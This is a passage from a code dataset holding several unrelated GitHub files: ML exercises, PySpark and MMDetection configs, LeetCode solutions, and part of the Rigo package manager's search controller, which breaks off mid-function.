np.array(y2.to_numpy())\n\n# 布兰达设置为1\nlearningRate = 1\nresult2 = opt.fmin_tnc(func=costREG, x0=theta2,\n fprime=gradientREG, args=(x2, y2, learningRate))\n\n# 使用训练集评测模型的准确率\ntheta_min = np.matrix(result2[0])\npredictions = predict(theta_min, x2)\n\ncorrent = []\nfor (a, b) in zip(predictions, y2):\n if (a == 1 and b == 1) or (a == 0 and b == 0):\n corrent.append(1)\n else:\n corrent.append(0)\naccuracy = (sum(corrent))/len(corrent)\n# print(\"accuracy is {0}%\".format(accuracy*100))\n\n\ndef hfunc2(theta, x1, x2):\n temp = theta[0][0]\n place = 0\n for i in range(1, degree+1):\n for j in range(0, i+1):\n temp = temp + np.power(x1, i-j)*np.power(x2, j)*theta[0][place+1]\n place = place+1\n return temp\n\n\ndef find_decision_boundary(theta):\n t1 = np.linspace(-1, 1.5, 1000)\n t2 = np.linspace(-1, 1.5, 1000)\n\n cordinates = [(x, y) for x in t1 for y in t2]\n x_cord, y_cord = zip(*cordinates)\n h_val = pd.DataFrame({\"x1\": x_cord, \"x2\": y_cord})\n h_val[\"hval\"] = hfunc2(theta, h_val[\"x1\"], h_val[\"x2\"])\n\n decision = h_val[np.abs(h_val[\"hval\"]) < 2*10**-3]\n return decision.x1, decision.x2\n\nfig, ax = plt.subplots(figsize=(8,5))\nax.scatter(positive2['test1'], positive2['test2'], s=50, c='b', marker='o', label='Accepted')\nax.scatter(negative2['test1'], negative2['test2'], s=50, c='r', marker='x', label='Rejected')\nax.set_xlabel('Test 1 Score')\nax.set_ylabel('Test 2 Score')\n\nx, y = find_decision_boundary(result2)\nplt.scatter(x, y, c='y', s=10, label='Prediction')\nax.legend()\nplt.show()","repo_name":"r1ght0us/daily_practice","sub_path":"andrew/ml/ex2/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":7883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6819013666","text":"\"\"\"Structures for organizing e-prints into periods of time.\"\"\"\n\nimport collections\nimport datetime\nfrom typing import NamedTuple, List, Mapping, Optional, Dict, Iterator, Tuple\n\nfrom typing_extensions import Protocol\n\nfrom .base import CanonicalBase\nfrom .eprint import EPrint\nfrom .version import Event\nfrom .identifier import Identifier, VersionedIdentifier\nfrom .listing import Listing\nfrom .util import now\nfrom .version import Version\n\nYear = int\nMonth = int\nYearMonth = Tuple[Year, Month]\n\n\nclass EPrintDay(CanonicalBase):\n \"\"\"E-prints originally announced on a specific day.\"\"\"\n\n def __init__(self, date: datetime.date,\n eprints: Mapping[Identifier, EPrint]) -> None:\n \"\"\"Initialize with e-prints for a particular day.\"\"\"\n self.date = date\n self.eprints = eprints\n\n\nclass EPrintMonth(CanonicalBase):\n \"\"\"E-prints originally announced in a particular calendar month.\"\"\"\n\n def __init__(self, name: YearMonth,\n days: Mapping[datetime.date, EPrintDay]) -> None:\n \"\"\"Initialize with e-prints for a particular month.\"\"\"\n self.name = name\n self.days = days\n\n @property\n def year(self) -> Year:\n return self.name[0]\n\n @property\n def month(self) -> Month:\n return self.name[1]\n\n\nclass EPrintYear(CanonicalBase):\n \"\"\"E-prints originally announced in a particular calendar year.\"\"\"\n\n def __init__(self, year: Year,\n months: Mapping[Tuple[int, int], EPrintMonth]) -> None:\n \"\"\"Initialize with e-prints for a particular year.\"\"\"\n self.year = year\n self.months = months\n\n\nclass AllEPrints(CanonicalBase):\n \"\"\"Represents the complete set of announced e-prints.\"\"\"\n\n def __init__(self, name: str,\n years: Mapping[int, EPrintYear]) -> None:\n \"\"\"Initialize with all of the e-prints in the record.\"\"\"\n self.name = name\n self.years = years\n","repo_name":"arXiv/arxiv-canonical","sub_path":"arxiv/canonical/domain/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"126172769","text":"import pyspark\r\nfrom pyspark.sql import SparkSession\r\nfrom pyspark.ml.classification import DecisionTreeClassifier\r\nfrom pyspark.sql import functions\r\nfrom pyspark.ml.feature import StringIndexer\r\nfrom pyspark.ml.feature import VectorAssembler\r\nfrom pyspark.ml import Pipeline\r\nfrom pyspark.sql.functions import col\r\nfrom pyspark.ml.tuning import ParamGridBuilder, CrossValidator\r\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator\r\nfrom pyspark.mllib.evaluation import MulticlassMetrics\r\n\r\nspark = SparkSession.builder \\\r\n .master('local[*]') \\\r\n .config(\"spark.driver.memory\", \"15g\") \\\r\n .config(\"spark.logConf\", \"true\") \\\r\n .appName('my-app') \\\r\n .getOrCreate()\r\n\r\ndf = spark.read.csv('fueltype.csv',header=True)\r\ndf = df.dropna(subset='fuelType')\r\ndf = df.fillna('0')\r\n\r\n\r\ndf.show(5)\r\ndf.printSchema()\r\ndf = df.fillna('0')\r\n\r\nindexers = [StringIndexer(inputCol=column, outputCol=column+\"_n\").fit(df) for column in list(\r\n set(df.columns)-set(['_c0']))]#\r\n\r\npipeline = Pipeline(stages=indexers)\r\ndf_r = pipeline.fit(df).transform(df)\r\n\r\ndf_r = df_r.select(*(col(c).cast(\"int\").alias(c) for c in df_r.columns))\r\ndf_fea = df_r.drop('_c0','brand','name','bodyType','year','transmission','power','fuelType')\r\n\r\ndf_fea.show(5)\r\ndf_fea.printSchema() \r\n \r\nassembler = VectorAssembler(inputCols=['brand_n', 'name_n','bodyType_n','year_n',\r\n 'transmission_n','power_n'], outputCol='features')\r\noutput = assembler.transform(df_fea)\r\n\r\nfinal_data = output.select('features', 'fuelType_n')\r\n\r\nfinal_data.show(5)\r\n\r\ntrain_data,test_data = final_data.randomSplit([0.7,0.3])\r\n\r\n\r\nmodel = DecisionTreeClassifier(labelCol='fuelType_n',featuresCol='features', maxDepth=10)\r\n\r\n# Create ParamGrid for Cross Validation\r\ndtparamGrid = (ParamGridBuilder()\r\n .addGrid(model.maxDepth, [7, 10, 13, 15, 20])\r\n .addGrid(model.maxBins, [20, 40, 60, 80, 100])\r\n .build())\r\n\r\n# Evaluate model\r\ndtevaluator = MulticlassClassificationEvaluator(labelCol= 'fuelType_n',metricName='f1')#\r\n\r\n# Create 5-fold CrossValidator\r\ndtcv = CrossValidator(estimator = model,\r\n estimatorParamMaps = dtparamGrid,\r\n evaluator = dtevaluator,\r\n numFolds = 5)\r\n\r\ndtc_model = dtcv.fit(train_data)\r\n\r\ndtc_preds = dtc_model.transform(test_data)\r\n\r\npred_acc = dtevaluator.evaluate(dtc_preds)\r\n\r\ntrain_acc = dtevaluator.evaluate(dtc_model.transform(train_data))\r\n\r\npred_table = dtc_preds.select(\"features\", \"prediction\",'probability', \"fuelType_n\")\r\npred_table.show(10)\r\npred_table.sample(False, 0.1, seed=0).limit(10).show()\r\nprint('')\r\nprint('============================================')\r\nprint('')\r\nprint('')\r\nprint('F1-score train : ',train_acc )\r\nprint('')\r\nprint('F1-score test : ',pred_acc )\r\nprint('')\r\nprint('')\r\nprint('============================================')\r\nprint('')","repo_name":"Kit6330300038/datamining","sub_path":"model1.py","file_name":"model1.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25533967813","text":"import falcon\nfrom aness.resources import BaseResource\nfrom aness.schemas import IndexSchema\n\n\nclass IndexResource(BaseResource):\n\n def on_get(self, req, resp):\n obj = {\n 'id': req.context['request_id'],\n 'document_meta': {\n 'copyright': 'Nocopyright',\n \"authors\": [\n \"altereg0\"\n ]\n }\n }\n _schema = IndexSchema()\n unresult = _schema.dump(obj)\n resp.status = falcon.HTTP_200\n resp.media = unresult.data\n\n\n def generate_mock(self):\n _ = self._\n description = (\n lambda: {\n \"id\": _('uuid'),\n \"name\": _('word'),\n \"version\": _('version', pre_release=True),\n \"owner\": {\n \"email\": _('email', key=str.lower),\n \"token\": _('token'),\n \"creator\": _('full_name'),\n },\n }\n )\n schema = self._Schema(schema=description)\n j = schema.create(iterations=1)\n pass\n","repo_name":"altereg0/3EQ4MRKk","sub_path":"aness/resources/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9736345634","text":"from set_lib_dir import LIB_ROOT_DIR\n\ndataset_type = 'DroneDataset' \ndata_root = LIB_ROOT_DIR + '/data/'\n\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\n\ntrain_pipeline = [\n dict(type='LoadImageFromFile', to_float32=True, color_type='color'),\n dict(type='LoadAnnotations', with_bbox=True),\n dict(\n type='PhotoMetricDistortion',\n brightness_delta=32,\n contrast_range=(0.5, 1.5),\n saturation_range=(0.5, 1.5),\n hue_delta=18),\n dict(\n type='RandomCenterCropPad',\n crop_size=(512, 512),\n ratios=(0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3),\n mean=[0, 0, 0],\n std=[1, 1, 1],\n to_rgb=True,\n test_pad_mode=None),\n dict(type='Resize', img_scale=(512, 512), keep_ratio=True),\n dict(type='RandomFlip', flip_ratio=0.5),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='DefaultFormatBundle'),\n dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels'])\n]\ntest_pipeline = [\n dict(type='LoadImageFromFile', to_float32=True),\n dict(\n type='MultiScaleFlipAug',\n scale_factor=1.0,\n flip=False,\n transforms=[\n dict(type='Resize', keep_ratio=True),\n dict(\n type='RandomCenterCropPad',\n ratios=None,\n border=None,\n mean=[0, 0, 0],\n std=[1, 1, 1],\n to_rgb=True,\n test_mode=True,\n test_pad_mode=['logical_or', 31],\n test_pad_add_pix=1),\n dict(type='RandomFlip'),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='DefaultFormatBundle'),\n dict(\n type='Collect',\n meta_keys=('filename', 'ori_shape', 'img_shape', 'pad_shape',\n 'scale_factor', 'flip', 'flip_direction',\n 'img_norm_cfg', 'border'),\n keys=['img'])\n ])\n]\n\ndata = dict(\n samples_per_gpu=16,\n workers_per_gpu=4,\n train=dict(\n type=dataset_type,\n ann_file=data_root + 'drone2021/annotations/split_train_coco.json',\n img_prefix=data_root + 'drone2021/images/',\n pipeline=train_pipeline),\n val=dict(\n type=dataset_type,\n ann_file=data_root + 'drone2021/annotations/split_val_coco.json',\n img_prefix=data_root + 'drone2021/images/',\n pipeline=test_pipeline),\n test=dict(\n type=dataset_type,\n ann_file=data_root + 'drone2021/annotations/split_val_coco.json',\n img_prefix=data_root + 'drone2021/images/',\n pipeline=test_pipeline))\nevaluation = dict(interval=1, metric='bbox')\n","repo_name":"IIM-TTIJ/MVA2023SmallObjectDetection4SpottingBirds","sub_path":"configs/mva2023_baseline/drone_dataset.py","file_name":"drone_dataset.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":80,"dataset":"github-code","pt":"40"} +{"seq_id":"73468015479","text":"class Solution(object):\n def sortColors(self, nums):\n # Count the occurrence of each color\n color_count = [0] * 3\n \n\n for i in range(len(nums)):\n color_count[nums[i]] += 1\n \n current_index = 0 # Keep track of the current index in the nums list\n \n # Iterate through the color_count array and \n # add the appropriate number of each color to the nums list\n for i in range(3):\n for j in range(color_count[i]): \n nums[current_index] = i\n current_index += 1\n return nums","repo_name":"Ketema741/Competitive-programming-group4","sub_path":"0075-sort-colors/0075-sort-colors.py","file_name":"0075-sort-colors.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"41707001008","text":"import argparse\nimport os\n\nimport pandas as pd\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_dir\", type=str, default=None)\n parser.add_argument(\"--output_dir\", type=str, default=None)\n\n args, _ = parser.parse_known_args()\n\n input_data_path = os.path.join(args.input_dir, \"train.csv\")\n output_data_path = os.path.join(args.output_dir, \"preprocessed.csv\")\n\n data = pd.read_csv(input_data_path)\n data.to_csv(output_data_path, header=False, index=False)\n","repo_name":"tkazusa/codepipeline-ml-cicd","sub_path":"stepfunctions_workflow/sm_processing/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1759476212","text":"\"\"\"\nYou are given an array of strings tokens that represents an arithmetic expression in a Reverse Polish Notation.\n\nEvaluate the expression. Return an integer that represents the value of the expression.\n\nNote that:\n\n The valid operators are '+', '-', '*', and '/'.\n Each operand may be an integer or another expression.\n The division between two integers always truncates toward zero.\n There will not be any division by zero.\n The input represents a valid arithmetic expression in a reverse polish notation.\n The answer and all the intermediate calculations can be represented in a 32-bit integer.\n\"\"\"\n\n\n#test case \n\ntokens0 = [\"2\",\"1\",\"+\",\"3\",\"*\"]\nout0 = 9 \n\ntokens1 = [\"4\",\"13\",\"5\",\"/\",\"+\"]\nout1 = 6\n\ntokens2 = [\"10\",\"6\",\"9\",\"3\",\"+\",\"-11\",\"*\",\"/\",\"*\",\"17\",\"+\",\"5\",\"+\"]\nout2 = 22\n\ntokens3 = [\"1\",\"3\",\"+\"]\nout3 = 4\n\ntokens4 = [\"18\"]\nout4 = 18\n\n\nclass Solution:\n\tdef evalRPN(self,tokens)->int:\n\t\t\"\"\"\n\t\tThe function evaluate the RPN based on the symbols\n\t\tArgs:\n\t\t\ttokens: (list) the list of the numbers and the symbols\n\t\tReturn:\n\t\t\tcal: (int) the value of the calulated integers based on the symbols\n\t\t\"\"\"\n\n\t\tstack = []\n\t\tleft = 0 \n\t\tlength = len(tokens) \n\t\tsymbol = (\"*\",\"/\",\"-\",\"+\")\n\n\n\t\twhile left < length:\n\n\t\t\tif tokens[left] not in symbol:\n\t\t\t\tstack.append(tokens[left])\n\t\t\telse:\n\t\t\t\t\n\t\t\t\tfirst = int(stack.pop())\n\t\t\t\tsecond = int(stack.pop())\n\t\t\t\t\n\t\t\t\tif tokens[left] == \"*\":\n\t\t\t\t\tcal = second * first\n\t\t\t\t\n\t\t\t\telif tokens[left] == \"/\":\n\t\t\t\t\tcal = second / first\n\n\t\t\t\telif tokens[left] == \"+\":\n\t\t\t\t\tcal = second + first\n\n\t\t\t\telif tokens[left] == \"-\":\n\t\t\t\t\tcal = second - first \n\n\t\t\t\tstack.append(cal)\n\n\t\t\tleft+=1\n\n\t\treturn int(stack.pop())\n\nsol = Solution()\nres = sol.evalRPN(tokens4)\n\nprint(res) ","repo_name":"abhishekprakash256/Python","sub_path":"leet_code_questions/neetcode_map/stacks/leet_code_polish_notation.py","file_name":"leet_code_polish_notation.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"42994421563","text":"from operator import mul, itemgetter, attrgetter\n# mul 用来两数相乘\n\n# itemgetter 构建一个获取字典值的函数\n\nsample = {\"a\": {\"b\": {\"c\": {\"d\": \"e\"}}}}\n\n\nclass S(object):\n def __init__(self, v):\n self.data = v\n\n def __repr__(self):\n return str(self.data)\n\n\nd = S(1)\nd.a = S(2)\nd.a.a2 = S(3)\n\n# func = itemgetter(\"a\", \"b\")\n# print(func)\n\n# print(func(sample))\n\nfunc2 = attrgetter(\"a.a2\") # 可以获取嵌套的属性\n\nprint(func2(d))\n\n\n","repo_name":"Niyuhang/read_books","sub_path":"fluent_python/chapter_5/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33892838773","text":"# Fifty-Fifty\nd = {}\nfor s in input():\n if s not in d.keys():\n d[s] = 1\n else:\n d[s] += 1\n\nif list(d.values()) == [2,2]:\n print('Yes')\nelse:\n print('No')","repo_name":"SkiMsyk/AtCoder","sub_path":"BeginnerContest_A/132.py","file_name":"132.py","file_ext":"py","file_size_in_byte":179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70654161081","text":"import os\nimport errno\nimport copy\nimport dbus\nfrom threading import Lock, Semaphore, Timer\n\nfrom gi.repository import Gtk, GLib, GObject\n\nfrom _entropy.rigo.paths import CONF_DIR\nfrom _entropy.rigo.enums import RigoViewStates, AppActions, Icons\nfrom _entropy.rigo.models.application import Application, ApplicationMetadata\nfrom _entropy.rigo.models.preference import Preference\nfrom _entropy.rigo.utils import escape_markup, prepare_markup\nfrom _entropy.rigo.ui.gtk3.widgets.notifications import \\\n NotificationBox\n\nfrom entropy.cache import EntropyCacher\nfrom entropy.const import etpConst, const_debug_write, \\\n const_debug_enabled, const_convert_to_unicode\nfrom entropy.misc import ParallelTask\nfrom entropy.i18n import _\n\nimport kswitch\n\n\nclass ApplicationsViewController(GObject.Object):\n\n __gsignals__ = {\n # View has been cleared\n \"view-cleared\" : (GObject.SignalFlags.RUN_LAST,\n None,\n tuple(),\n ),\n # View has been filled\n \"view-filled\" : (GObject.SignalFlags.RUN_LAST,\n None,\n tuple(),\n ),\n # View has been filled\n \"view-want-change\" : (GObject.SignalFlags.RUN_LAST,\n None,\n (GObject.TYPE_PYOBJECT,\n GObject.TYPE_PYOBJECT,),\n ),\n # User logged in to Entropy Web Services\n \"logged-in\" : (GObject.SignalFlags.RUN_LAST,\n None,\n (GObject.TYPE_PYOBJECT,),\n ),\n # User logged out from Entropy Web Services\n \"logged-out\" : (GObject.SignalFlags.RUN_LAST,\n None,\n tuple(),\n ),\n }\n\n RECENT_SEARCHES_DIR = os.path.join(CONF_DIR, \"recent_searches\")\n RECENT_SEARCHES_CACHE_KEY = \"list\"\n RECENT_SEARCHES_MAX_LEN = 20\n MIN_RECENT_SEARCH_KEY_LEN = 2\n\n SHOW_INSTALLED_KEY = \"in:installed\"\n SHOW_EXACT_MATCH = \"in:exact\"\n SHOW_CATEGORY_KEY = \"in:category\"\n SHOW_QUEUE_KEY = \"in:queue\"\n SHOW_KERNEL_BINS_KEY = \"in:kernels\"\n SHOW_KERNEL_LTS_BINS_KEY = \"in:kernels-lts\"\n\n def __init__(self, activity_rwsem, entropy_client, entropy_ws,\n nc, bottom_nc, rigo_service, prefc, icons, nf_box,\n search_entry, search_entry_completion,\n search_entry_store, store, view):\n GObject.Object.__init__(self)\n\n self._activity_rwsem = activity_rwsem\n self._entropy = entropy_client\n self._service = rigo_service\n self._icons = icons\n self._entropy_ws = entropy_ws\n self._search_entry = search_entry\n self._store = store\n self._view = view\n self._nf_box = nf_box\n self._not_found_search_box = None\n self._not_found_label = None\n self._nc = nc\n self._bottom_nc = bottom_nc\n self._prefc = prefc\n\n self._kswitch = kswitch.KernelSwitcher(self._entropy)\n self._cacher = EntropyCacher()\n self._search_thread_mutex = Lock()\n\n self._search_completion = search_entry_completion\n self._search_completion_model = search_entry_store\n # speedup the damn ListStore\n self._search_completion_model_set = set()\n self._search_writeback_mutex = Lock()\n self._search_writeback_thread = None\n\n def _search_icon_release(self, search_entry, icon_pos, _other):\n \"\"\"\n Event associated to the Search bar icon click.\n Here we catch secondary icon click to reset the search entry text.\n \"\"\"\n if search_entry is not self._search_entry:\n return\n if icon_pos == Gtk.EntryIconPosition.SECONDARY:\n search_entry.set_text(\"\")\n self.clear()\n search_entry.emit(\"changed\")\n elif self._store.get_iter_first():\n # primary icon click will force UI to switch to Browser mode\n self.emit(\"view-filled\")\n else:\n self.emit(\"view-cleared\")\n\n def _search_activate(self, search_entry):\n text = search_entry.get_text()\n if not text:\n return self.clear()\n return self._search(text, _force=True)\n\n def _search_changed(self, search_entry):\n GLib.timeout_add(700, self._search, search_entry.get_text())\n\n def _search(self, old_text, _force=False):\n cur_text = self._search_entry.get_text()\n if (cur_text == old_text and cur_text) or _force:\n search_text = copy.copy(old_text)\n search_text = const_convert_to_unicode(\n search_text, enctype=etpConst['conf_encoding'])\n if _force:\n self._search_entry.set_text(search_text)\n th = ParallelTask(self.__search_thread, search_text)\n th.name = \"SearchThread\"\n th.start()\n\n def __search_produce_matches(self, text):\n \"\"\"\n Execute the actual search inside Entropy repositories.\n \"\"\"\n def _prepare_for_search(txt):\n return txt.replace(\" \", \"-\").lower()\n\n split_text = text.split()\n if not split_text:\n # text is empty, exit now\n return\n # support for search cmd + arguments\n # some search_cmds can have arguments provided\n search_cmd, search_args = split_text[0], split_text[1:]\n sort = False\n\n show_exact = search_cmd == ApplicationsViewController.SHOW_EXACT_MATCH\n\n with self._entropy.rwsem().reader():\n matches = []\n use_fallback = True\n\n # in:installed [ ...]\n if search_cmd == ApplicationsViewController.SHOW_INSTALLED_KEY:\n use_fallback = False\n sort = True\n\n inst_repo = self._entropy.installed_repository()\n with inst_repo.direct():\n if not search_args:\n for pkg_id in inst_repo.listAllPackageIds(\n order_by=\"atom\"):\n matches.append((pkg_id, inst_repo.repository_id()))\n else:\n for search_arg in search_args:\n for pkg_id in inst_repo.searchPackages(\n search_arg.lower(), just_id=True):\n matches.append(\n (pkg_id, inst_repo.repository_id()))\n\n elif search_cmd == \\\n ApplicationsViewController.SHOW_CATEGORY_KEY and \\\n search_args:\n use_fallback = False\n sort = True\n for search_arg in search_args:\n matches += self._entropy.atom_search(search_arg + \"/\")\n\n # package set search\n elif search_cmd.startswith(etpConst['packagesetprefix']):\n use_fallback = False\n sort = True\n sets = self._entropy.Sets()\n package_deps = sets.expand(text)\n for package_dep in package_deps:\n pkg_id, pkg_repo = self._entropy.atom_match(\n package_dep)\n if pkg_id != -1:\n matches.append((pkg_id, pkg_repo))\n\n elif show_exact and search_args:\n use_fallback = False\n for search_arg in search_args:\n pkg_matches, rc = self._entropy.atom_match(\n search_arg, multi_match=True,\n multi_repo=True, mask_filter=False)\n matches.extend(pkg_matches)\n\n # fallback search\n if not matches and use_fallback:\n pkg_matches, rc = self._entropy.atom_match(\n text, multi_match=True,\n multi_repo=True, mask_filter=False)\n matches.extend(pkg_matches)\n\n # atom searching (name and desc)\n search_matches = self._entropy.atom_search(\n text,\n repositories = self._entropy.repositories(),\n description = True)\n\n matches.extend([x for x in search_matches \\\n if x not in matches])\n\n if not search_matches:\n search_matches = self._entropy.atom_search(\n _prepare_for_search(text),\n repositories = self._entropy.repositories())\n matches.extend(\n [x for x in search_matches if x not in matches])\n\n if sort:\n matches.sort(key=self._sort_key)\n return matches\n\n def install(self, dependency, simulate=False):\n \"\"\"\n Try to match dependency to an Application and then install\n it, if possible.\n \"\"\"\n const_debug_write(\n __name__,\n \"install: %s\" % (dependency,))\n\n with self._entropy.rwsem().reader():\n pkg_match = self._entropy.atom_match(dependency)\n\n pkg_id, pkg_repo = pkg_match\n if pkg_id == -1:\n const_debug_write(\n __name__,\n \"install: \"\n \"no match for: %s\" % (dependency,))\n def _notify():\n msg = _(\"Application %s not found\")\n msg = msg % (dependency,)\n box = NotificationBox(\n prepare_markup(msg),\n message_type=Gtk.MessageType.ERROR,\n context_id=\"AppInstallNotFoundContextId\")\n self._nc.append(box, timeout=10)\n if self._nc is not None:\n GLib.idle_add(_notify)\n return\n\n app = Application(\n self._entropy, self._entropy_ws,\n self._service, pkg_match)\n self._service.application_request(\n app, AppActions.INSTALL, simulate=simulate)\n\n const_debug_write(\n __name__,\n \"install: \"\n \"application_request() sent for: %s, %s\" % (\n dependency, app,))\n\n def install_package(self, package_path, simulate=False):\n \"\"\"\n Install Entropy Package file.\n \"\"\"\n const_debug_write(\n __name__,\n \"install_package: %s\" % (package_path,))\n\n self._service.package_install_request(\n package_path, simulate=simulate)\n\n const_debug_write(\n __name__,\n \"install_package: \"\n \"package_install_request() sent for: %s\" % (\n package_path,))\n\n def remove(self, dependency, simulate=False):\n \"\"\"\n Try to match dependency to an Application and then remove\n it, if possible.\n \"\"\"\n const_debug_write(\n __name__,\n \"remove: %s\" % (dependency,))\n\n with self._entropy.rwsem().reader():\n inst_repo = self._entropy.installed_repository()\n pkg_repo = inst_repo.repository_id()\n with inst_repo.direct():\n pkg_id, rc = inst_repo.atomMatch(dependency)\n\n if pkg_id == -1:\n const_debug_write(\n __name__,\n \"remove: \"\n \"no match for: %s\" % (dependency,))\n def _notify():\n msg = _(\"Application %s not found\")\n msg = msg % (dependency,)\n box = NotificationBox(\n prepare_markup(msg),\n message_type=Gtk.MessageType.ERROR,\n context_id=\"AppRemoveNotFoundContextId\")\n self._nc.append(box, timeout=10)\n if self._nc is not None:\n GLib.idle_add(_notify)\n return\n\n app = Application(\n self._entropy, self._entropy_ws,\n self._service, (pkg_id, pkg_repo))\n self._service.application_request(\n app, AppActions.REMOVE, simulate=simulate)\n\n const_debug_write(\n __name__,\n \"remove: \"\n \"application_request() sent for: %s, %s\" % (\n dependency, app,))\n\n def upgrade(self, simulate=False):\n \"\"\"\n Launch a System Upgrade activity.\n \"\"\"\n const_debug_write(\n __name__, \"upgrade\")\n self._service.upgrade_system(simulate=simulate)\n const_debug_write(\n __name__, \"upgrade:\"\n \" upgrade_system() sent\")\n\n def _show_action_queue_items(self, _invalid_matches=False):\n \"\"\"\n Request the UI to show the current Action Queue, if any.\n \"\"\"\n const_debug_write(\n __name__, \"_show_action_queue_items called\")\n apps = self._service.action_queue_items()\n const_debug_write(\n __name__, \"_show_action_queue_items, items: %d\" % (len(apps),))\n\n matches = []\n if not _invalid_matches:\n for app in apps:\n const_debug_write(\n __name__, \"_show_action_queue_items:\"\n \" %s\" % (app,))\n matches.append(app.get_details().pkg)\n else:\n with self._entropy.rwsem().reader():\n inst_repo = self._entropy.installed_repository()\n repo_name = inst_repo.repository_id()\n matches.extend(\n [(-2, repo_name),\n (-5, repo_name),\n (-10, repo_name)])\n\n if matches:\n self.set_many_safe(matches,\n _from_search=ApplicationsViewController.SHOW_QUEUE_KEY)\n\n def __simulate_orphaned_apps(self, text):\n\n const_debug_write(\n __name__,\n \"__simulate_orphaned_apps: \"\n \"%s\" % (text,))\n with self._entropy.rwsem().reader():\n inst_repo = self._entropy.installed_repository()\n with inst_repo.direct():\n pkg_ids = inst_repo.searchPackages(text, just_id=True)\n manual_pkg_ids, rc = inst_repo.atomMatch(text, multiMatch=True)\n\n def _notify():\n self._service._unsupported_applications_signal(\n list(manual_pkg_ids), pkg_ids)\n GLib.idle_add(_notify)\n\n const_debug_write(\n __name__,\n \"__simulate_orphaned_apps: completed\")\n\n def __search_thread(self, text):\n\n # this will be accessible to all the embedded functions here\n split_text = text.strip().split()\n if not split_text:\n return\n\n def _in_config():\n GLib.idle_add(self.emit, \"view-want-change\",\n RigoViewStates.PREFERENCES_VIEW_STATE,\n None)\n\n def _in_repo():\n GLib.idle_add(self.emit, \"view-want-change\",\n RigoViewStates.REPOSITORY_VIEW_STATE,\n None)\n\n def _in_groups():\n GLib.idle_add(self.emit, \"view-want-change\",\n RigoViewStates.GROUPS_VIEW_STATE,\n None)\n\n def _in_vte():\n GLib.idle_add(self.emit, \"view-want-change\",\n RigoViewStates.WORK_VIEW_STATE,\n None)\n\n def _in_simulate_i():\n sim_str = \" \".join(split_text[1:])\n if sim_str:\n self.install(sim_str, simulate=True)\n\n def _in_simulate_r():\n sim_str = \" \".join(split_text[1:])\n if sim_str:\n self.remove(sim_str, simulate=True)\n\n def _in_simulate_o():\n sim_str = \" \".join(split_text[1:])\n if sim_str:\n self.__simulate_orphaned_apps(sim_str, simulate=True)\n\n def _in_simulate_u():\n self.upgrade(simulate=True)\n\n def _in_simulate_v():\n self._show_action_queue_items(_invalid_matches=True)\n\n def _do_install():\n sim_str = \" \".join(split_text[1:])\n if sim_str:\n self.install(sim_str)\n\n def _do_remove():\n sim_str = \" \".join(split_text[1:])\n if sim_str:\n self.remove(sim_str)\n\n def _do_optimize_mirrors():\n with self._entropy.rwsem().reader():\n repository_ids = self._entropy.repositories()\n self._service.optimize_mirrors(repository_ids)\n\n def _in_kernels_generic(kernel_virtual):\n with self._entropy.rwsem().reader():\n pkg_matches = self._kswitch.list(virtual=kernel_virtual)\n self.set_many_safe(pkg_matches, _from_search=True)\n\n def _in_kernels():\n _in_kernels_generic(kswitch.KERNEL_BINARY_VIRTUAL)\n\n def _in_kernels_lts():\n _in_kernels_generic(kswitch.KERNEL_BINARY_LTS_VIRTUAL)\n\n special_keys_map = {\n \"in:kernels\": _in_kernels,\n \"in:kernels-lts\": _in_kernels_lts,\n \"in:confupdate\": self._service.configuration_updates,\n self.SHOW_QUEUE_KEY: self._show_action_queue_items,\n \"in:config\": _in_config,\n \"in:notice\": self._service.noticeboards,\n \"in:groups\": _in_groups,\n \"in:repo\": _in_repo,\n \"in:vte\": _in_vte,\n \"do:simulate:i\": _in_simulate_i,\n \"do:simulate:r\": _in_simulate_r,\n \"do:simulate:o\": _in_simulate_o,\n \"do:simulate:u\": _in_simulate_u,\n \"do:simulate:v\": _in_simulate_v,\n \"do:update\": self._update_repositories_safe,\n \"do:install\": _do_install,\n \"do:remove\": _do_remove,\n \"do:upgrade\": self.upgrade,\n \"do:hello\": self._service.hello,\n \"do:optimize\": _do_optimize_mirrors,\n }\n\n special_f = special_keys_map.get(split_text[0])\n if special_f is not None:\n special_f()\n return\n\n return self.__search_thread_body(text)\n\n def __search_thread_body(self, text):\n \"\"\"\n Core logic that implements the effective search task.\n \"\"\"\n\n # serialize searches to avoid segfaults with sqlite3\n # (apparently?)\n with self._search_thread_mutex:\n # Do not execute search if repositories are\n # being hold by other write\n acquired = self._service.repositories_lock.acquire(False)\n if not acquired:\n # this avoids having starvation here.\n return\n try:\n\n matches = self.__search_produce_matches(text)\n # we have to decide if to show the treeview in\n # the UI thread, to avoid races (and also because we\n # have to...)\n self.set_many_safe(matches, _from_search=text)\n if 